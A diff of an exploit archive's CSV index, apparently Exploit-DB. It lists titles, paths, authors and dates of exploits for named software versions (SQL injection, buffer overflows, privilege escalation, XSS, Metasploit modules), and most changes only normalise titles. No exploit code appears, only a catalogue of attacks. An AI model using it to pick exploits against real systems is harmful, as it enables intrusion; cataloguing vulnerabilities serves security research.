9965,platforms/php/webapps/9965.txt,"RunCMS 2ma post.php SQL injection",2009-10-26,bookoo,php,webapps,0
9966,platforms/windows/remote/9966.txt,"Serv-u Web client 9.0.0.5 - Buffer Overflow",2009-11-02,"Nikolas Rangos",windows,remote,80
9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80
9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 Team Services source code disclosure",2009-10-26,"Daniel Martin",asp,webapps,0
9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0
9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0
@ -10373,7 +10374,7 @@ id,file,description,date,author,platform,type,port
11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (password field) Universal BoF Exploit",2010-02-02,mr_me,windows,local,0
11315,platforms/windows/local/11315.c,"Deepburner pro 1.9.0.228 dbr file Buffer Overflow Exploit (Universal)",2010-02-02,"fl0 fl0w",windows,local,0
11316,platforms/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services",2010-02-02,R3VAN_BASTARD,php,webapps,0
11317,platforms/windows/local/11317.c,"Qihoo 360 Security Guard breg device drivers Privilege Escalation Vulnerability",2010-02-02,anonymous,windows,local,0
11317,platforms/windows/local/11317.c,"Qihoo 360 Security Guard 6.1.5.1009 - breg device drivers Privilege Escalation Vulnerability",2010-02-02,anonymous,windows,local,0
11318,platforms/php/webapps/11318.txt,"Dlili Script SQL Injection Vulnerability",2010-02-02,Dr.DaShEr,php,webapps,0
11319,platforms/php/webapps/11319.txt,"MYRE Classified (cat) SQL Injection Vulnerability",2010-02-02,kaMtiEz,php,webapps,0
11320,platforms/windows/dos/11320.pl,"Digital Amp MP3 3.1 - (.Mp3) Local Crash PoC",2010-02-02,SkuLL-HackeR,windows,dos,0
@ -12298,7 +12299,7 @@ id,file,description,date,author,platform,type,port
13955,platforms/php/webapps/13955.txt,"Joomla Template BizWeb com_community Persistent XSS Vulnerability",2010-06-21,Sid3^effects,php,webapps,0
13956,platforms/php/webapps/13956.txt,"Joomla Hot Property com_jomestate RFI Vulnerability",2010-06-21,Sid3^effects,php,webapps,0
13957,platforms/php/webapps/13957.txt,"myUPB <= 2.2.6 - Multiple Vulnerabilities",2010-06-21,"ALTBTA ",php,webapps,0
13958,platforms/windows/dos/13958.txt,"Sysax Multi Server (SFTP module) Multiple Commands DoS Vulnerabilities",2010-06-21,leinakesi,windows,dos,0
13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 - (SFTP Module) Multiple Commands DoS Vulnerabilities",2010-06-21,leinakesi,windows,dos,0
13959,platforms/windows/dos/13959.c,"teamspeak <= 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987
14363,platforms/php/webapps/14363.txt,"Ad Network Script Persistent XSS Vulnerability",2010-07-14,Sid3^effects,php,webapps,0
14359,platforms/php/webapps/14359.html,"Zenphoto CMS 1.3 - Multiple CSRF Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0
@ -13092,7 +13093,7 @@ id,file,description,date,author,platform,type,port
15011,platforms/php/webapps/15011.txt,"php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0
15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote,0
15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote,0
36828,platforms/java/webapps/36828.txt,"JaWiki 'versionNo' Parameter Cross Site Scripting Vulnerability",2012-02-17,sonyy,java,webapps,0
15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - (.mp3 / .wma) Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0
15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
@ -13824,7 +13825,7 @@ id,file,description,date,author,platform,type,port
15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 - CAP_SYS_ADMIN x86 & x64 - Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0
16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
@ -14165,7 +14166,7 @@ id,file,description,date,author,platform,type,port
16359,platforms/windows/remote/16359.rb,"Microsoft WINS Service Memory Overwrite",2010-09-20,metasploit,windows,remote,0
16360,platforms/windows/remote/16360.rb,"Microsoft Windows SMB Relay Code Execution",2010-09-21,metasploit,windows,remote,0
16361,platforms/windows/remote/16361.rb,"Microsoft Print Spooler Service - Impersonation Vulnerability (MS10-061)",2011-02-17,metasploit,windows,remote,0
16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,metasploit,windows,remote,0
16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,metasploit,windows,remote,0
16363,platforms/windows/remote/16363.rb,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,metasploit,windows,remote,0
16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service Overflow",2010-05-09,metasploit,windows,remote,0
16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service Overflow",2010-08-30,metasploit,windows,dos,0
@ -14976,7 +14977,7 @@ id,file,description,date,author,platform,type,port
17204,platforms/php/webapps/17204.txt,"DynMedia Pro Web CMS 4.0 - Local File Disclosure",2011-04-22,Mbah_Semar,php,webapps,0
17205,platforms/php/webapps/17205.txt,"4images 1.7.9 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0
17206,platforms/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injection Vulnerabilities",2011-04-22,^Xecuti0N3r,php,webapps,0
17207,platforms/php/webapps/17207.txt,"WordPress Plugin ajax category dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0
17207,platforms/php/webapps/17207.txt,"WordPress Plugin ajax category dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0
17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 SQL Injection Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0
17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 - (PluginController.php) Local File Inclusion Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0
17213,platforms/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0
@ -15933,7 +15934,7 @@ id,file,description,date,author,platform,type,port
18975,platforms/php/webapps/18975.rb,"Log1 CMS writeInfo() PHP Code Injection",2012-06-03,metasploit,php,webapps,0
18976,platforms/php/dos/18976.php,"PHP 5.3.10 - spl_autoload() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0
18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution",2012-01-18,metasploit,windows,remote,0
18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 Create Folder BOF",2012-01-18,"Craig Freyman",windows,remote,0
18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder BOF",2012-01-18,"Craig Freyman",windows,remote,0
18383,platforms/php/webapps/18383.txt,"pGB 2.12 kommentar.php SQL Injection Vulnerability",2012-01-18,3spi0n,php,webapps,0
18384,platforms/php/webapps/18384.txt,"PhpBridges Blog System members.php SQL Injection",2012-01-18,3spi0n,php,webapps,0
18385,platforms/php/webapps/18385.txt,"DZCP (deV!L_z Clanportal) Gamebase Addon - SQL Injection Vulnerability",2012-01-18,"Easy Laster",php,webapps,0
@ -16012,7 +16013,7 @@ id,file,description,date,author,platform,type,port
18471,platforms/windows/local/18471.c,"TORCS <= 1.3.2 xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0
18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Include Vulnerability",2012-02-08,Vulnerability-Lab,multiple,webapps,0
18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 BSOD",2012-02-09,shinnai,windows,dos,0
18476,platforms/windows/remote/18476.py,"Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0
18476,platforms/windows/remote/18476.py,"Sysax Multi Server <= 5.52 - File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0
18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow",2012-02-10,metasploit,windows,remote,0
18479,platforms/windows/remote/18479.rb,"Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",2012-02-10,metasploit,windows,remote,0
18480,platforms/php/webapps/18480.txt,"Dolibarr CMS 3.2.0 - Alpha - File Include Vulnerabilities",2012-02-10,Vulnerability-Lab,php,webapps,0
@ -16062,8 +16063,8 @@ id,file,description,date,author,platform,type,port
18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,metasploit,windows,local,0
18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow Vulnerability",2012-02-27,Vulnerability-Lab,windows,local,0
18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0
18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0
18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0
18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 - SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0
18536,platforms/php/webapps/18536.txt,"WebfolioCMS <= 1.1.4 - CSRF (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0
18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0
18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,metasploit,windows,remote,0
@ -16085,7 +16086,7 @@ id,file,description,date,author,platform,type,port
18554,platforms/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 - Multiple SQLi",2012-03-03,G13,php,webapps,0
18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow Vulnerability",2012-03-03,Vulnerability-Lab,windows,remote,0
18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0
18557,platforms/windows/remote/18557.rb,"Sysax 5.53 SSH Username Buffer Overflow (Metasploit)",2012-03-04,metasploit,windows,remote,0
18557,platforms/windows/remote/18557.rb,"Sysax 5.53 - SSH Username Buffer Overflow (Metasploit)",2012-03-04,metasploit,windows,remote,0
18558,platforms/php/webapps/18558.txt,"DZCP (deV!L_z Clanportal) Witze Addon 0.9 - SQL Injection Vulnerability",2012-03-04,"Easy Laster",php,webapps,0
18559,platforms/php/webapps/18559.txt,"AneCMS 2e2c583 - LFI Exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0
18566,platforms/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps,0
@ -16164,7 +16165,7 @@ id,file,description,date,author,platform,type,port
18655,platforms/php/webapps/18655.php,"phpFox <= 3.0.1 (ajax.php) Remote Command Execution Exploit",2012-03-23,EgiX,php,webapps,0
18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - (.m3u) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
18695,platforms/windows/remote/18695.py,"sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
18695,platforms/windows/remote/18695.py,"Sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow_",2012-03-24,metasploit,windows,remote,0
18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0
18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0
@ -16376,7 +16377,7 @@ id,file,description,date,author,platform,type,port
18935,platforms/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQLi Vulnerabilities",2012-05-27,loneferret,php,webapps,0
18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability",2012-05-28,metasploit,linux,remote,0
18937,platforms/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,php,webapps,0
18981,platforms/windows/local/18981.txt,"Sysax <= 5.60 Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
18981,platforms/windows/local/18981.txt,"Sysax <= 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injection Vulnerabilities",2012-05-28,loneferret,php,webapps,0
18945,platforms/windows/dos/18945.txt,"WinRadius Server 2009 - Denial of Service",2012-05-29,demonalex,windows,dos,0
18946,platforms/windows/dos/18946.txt,"Tftpd32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,windows,dos,0
@ -16683,7 +16684,7 @@ id,file,description,date,author,platform,type,port
19290,platforms/multiple/dos/19290.txt,"Airlock WAF 4.2.4 Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos,0
19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer <= 6.4.017 - Stack Buffer Overflow Vulnerability",2012-06-19,metasploit,windows,remote,0
19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilites",2012-06-19,Vulnerability-Lab,php,webapps,0
19293,platforms/windows/local/19293.py,"Sysax <= 5.62 Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0
19293,platforms/windows/local/19293.py,"Sysax <= 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0
19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 - XSS",2012-06-20,"Henry Hoggard",php,webapps,0
19295,platforms/windows/remote/19295.rb,"Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",2012-06-20,metasploit,windows,remote,0
19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal Vulnerability",1999-11-04,"Ussr Labs",windows,remote,0
@ -17998,7 +17999,6 @@ id,file,description,date,author,platform,type,port
20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 (index.php id parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0
20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload Vulnerability",2012-08-22,metasploit,php,webapps,0
20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Stored XSS",2012-08-20,"Shai rod",php,webapps,0
20676,platforms/windows/remote/20676.rb,"Sysax Multi-Server 5.64 Create Folder Buffer Overflow",2012-08-20,"Matt Andreko",windows,remote,0
20677,platforms/windows/webapps/20677.txt,"IOServer _Root Directory_ Trailing Backslash Multiple Vulnerabilities",2012-08-20,hinge,windows,webapps,0
20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow Vulnerability (1)",2001-03-08,anonymous,unix,local,0
20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow Vulnerability (2)",2001-03-08,"the itch",unix,local,0
@ -18022,7 +18022,7 @@ id,file,description,date,author,platform,type,port
20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched Long Error Message Buffer Overflow Vulnerability",2001-03-19,"Luciano Rocha",unix,local,0
20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0
20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi Vulnerability",2012-08-21,loneferret,php,webapps,0
20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 Create Folder Buffer Overflow",2012-08-21,metasploit,windows,remote,0
20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow",2012-08-21,metasploit,windows,remote,0
20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0
20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal Vulnerability",2001-03-27,"UkR hacking team",cgi,remote,0
20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 Logging Output File Vulnerability",2001-03-23,KimYongJun,solaris,local,0
@ -18218,7 +18218,7 @@ id,file,description,date,author,platform,type,port
20912,platforms/windows/remote/20912.txt,"Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification Vulnerability",2001-06-12,"SNS Advisory",windows,remote,0
20913,platforms/php/webapps/20913.txt,"Disqus Blog Comments Blind SQL Injection Vulnerability",2012-08-29,Spy_w4r3,php,webapps,0
20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 Administrator Authentication Bypass Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0
20915,platforms/windows/local/20915.py,"ActFax 4.31 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0
20915,platforms/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0
20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 - Arbitrary Command Execution Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0
20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability",2012-08-29,Ciph3r,windows,dos,0
20918,platforms/php/webapps/20918.txt,"WordPress HD Webplayer 1.1 - SQL Injection Vulnerability",2012-08-29,JoinSe7en,php,webapps,0
@ -23511,7 +23511,7 @@ id,file,description,date,author,platform,type,port
26374,platforms/windows/remote/26374.txt,"Xerver 4.17 Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",windows,remote,0
26375,platforms/windows/remote/26375.txt,"Xerver 4.17 - Forced Directory Listing",2005-10-19,"Ziv Kamir",windows,remote,0
26376,platforms/windows/remote/26376.txt,"Xerver 4.17 Server URI Null Character XSS",2005-10-19,"Ziv Kamir",windows,remote,0
26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - Modules.PHP Remote Directory Traversal Vulnerability",2005-10-19,sp3x@securityreason.com,php,webapps,0
26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - Modules.PHP Remote Directory Traversal Vulnerability",2005-10-19,sp3x@securityreason.com,php,webapps,0
26378,platforms/php/webapps/26378.txt,"Chipmunk Forum newtopic.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0
26379,platforms/php/webapps/26379.txt,"Chipmunk Forum quote.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0
26380,platforms/php/webapps/26380.txt,"Chipmunk Forum recommend.php ID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0
@ -33180,9 +33180,9 @@ id,file,description,date,author,platform,type,port
36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0
36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross Site Request Forgery Vulnerability",2012-02-13,MustLive,hardware,remote,0
36768,platforms/php/webapps/36768.txt,"ProWiki 'id' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0
36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal - prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal - prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal - team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability",2012-02-13,chippy1337,cgi,webapps,0
36773,platforms/windows/dos/36773.c,"Microsoft Window - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
36774,platforms/php/webapps/36774.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download Exploit",2015-04-15,"Necmettin COSKUN",php,webapps,0
@ -33852,7 +33852,7 @@ id,file,description,date,author,platform,type,port
37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - DoS PoC",2015-07-09,Arsyntex,linux,dos,0
37563,platforms/php/webapps/37563.html,"WordPress G-Lock Double Opt-in Manager Plugin SQL Injection Vulnerability",2012-08-01,BEASTIAN,php,webapps,0
37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
37492,platforms/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80
37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0
37494,platforms/php/webapps/37494.txt,"WordPress S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0
@ -34025,7 +34025,7 @@ id,file,description,date,author,platform,type,port
37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,dos,0
37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,hyp3rlinx,multiple,webapps,0
37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G 3.0.1.4912 - CSRF Vulnerability",2015-07-24,hyp3rlinx,multiple,webapps,0
37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0
37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0
37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0
@ -34038,7 +34038,7 @@ id,file,description,date,author,platform,type,port
37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0
37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting Vulnerability",2012-09-05,"High-Tech Bridge",php,webapps,0
37699,platforms/windows/local/37699.py,"Foxit Reader - PNG Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G 3.0.1.4912 - Persistent XSS & Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0
37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0
@ -34238,7 +34238,7 @@ id,file,description,date,author,platform,type,port
37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0
37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin 'id' Parameter Cross Site Scripting Vulnerability",2012-09-26,"Scott Herbert",php,webapps,0
37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 Denial of Service Vulnerability",2012-09-27,"Ryuzaki Lawlet",linux,dos,0
37898,platforms/windows/local/37898.py,"Reaver Pro Local Privilege Escalation Vulnerability",2012-09-30,infodox,windows,local,0
37898,platforms/linux/local/37898.py,"Reaver Pro - Local Privilege Escalation Vulnerability",2012-09-30,infodox,linux,local,0
37899,platforms/php/webapps/37899.txt,"Switchvox Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0
37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0
37901,platforms/php/webapps/37901.txt,"AlamFifa CMS 'user_name_cookie' Parameter SQL Injection Vulnerability",2012-09-30,L0n3ly-H34rT,php,webapps,0
@ -34336,7 +34336,7 @@ id,file,description,date,author,platform,type,port
38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0
38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness",2012-11-08,"Sooel Son",php,webapps,0
38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server 'where' Form Field SQL Injection Vulnerability",2012-11-09,anonymous,multiple,webapps,0
